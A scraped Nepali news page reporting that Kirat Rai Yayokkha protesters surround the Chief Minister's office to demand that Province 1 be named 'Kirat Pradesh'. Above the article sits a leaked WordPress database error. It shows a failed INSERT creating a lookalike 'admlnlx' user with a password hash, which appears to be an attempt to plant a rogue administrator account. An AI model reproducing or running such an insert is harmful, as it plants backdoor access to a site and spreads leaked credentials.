WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bf19ILNga3yx1e98.9EM7aevFlURTg1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:50:29', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । प्रदेश सभाको पहिलो कार्यकाल सकिन लाग्दा पनि प्रदेशले अझै आफ्नो नाम समेत टुङ्ग्याउन नसकेको हुदा प्रदेश १ को नामकरणको विषय निकै पेचिलो बन्दै गइरहेको छ ।
प्रदेश १ को नाम पहिचानका आधारमा राख्न माग गर्दै दबाबका कार्यक्रमहरू आयोजना भइरहेका छन् । किरात राई यायोक्खाले प्रदेशको नाम ‘किरात प्रदेश’ राख्न माग गर्दै मुख्यमन्त्री कार्यालय अगाडि घेराउ गरेका छन्। घेराउ कार्यक्रममा १४ जिल्लाकै मानिस भेला भएसँगै पहिचानको आधारमा प्रदेश १ को नाम किरात हुनुपर्नेमा जोड दिँदै नाराबाजी गरेका छन् । घेराउपछि मुख्यमन्त्री राजेन्द्र कुमार राईलाई ज्ञापन पत्र प्रदान गर्ने र प्रदेशसभा घेराउ गर्ने कार्यक्रम रहेको छ ।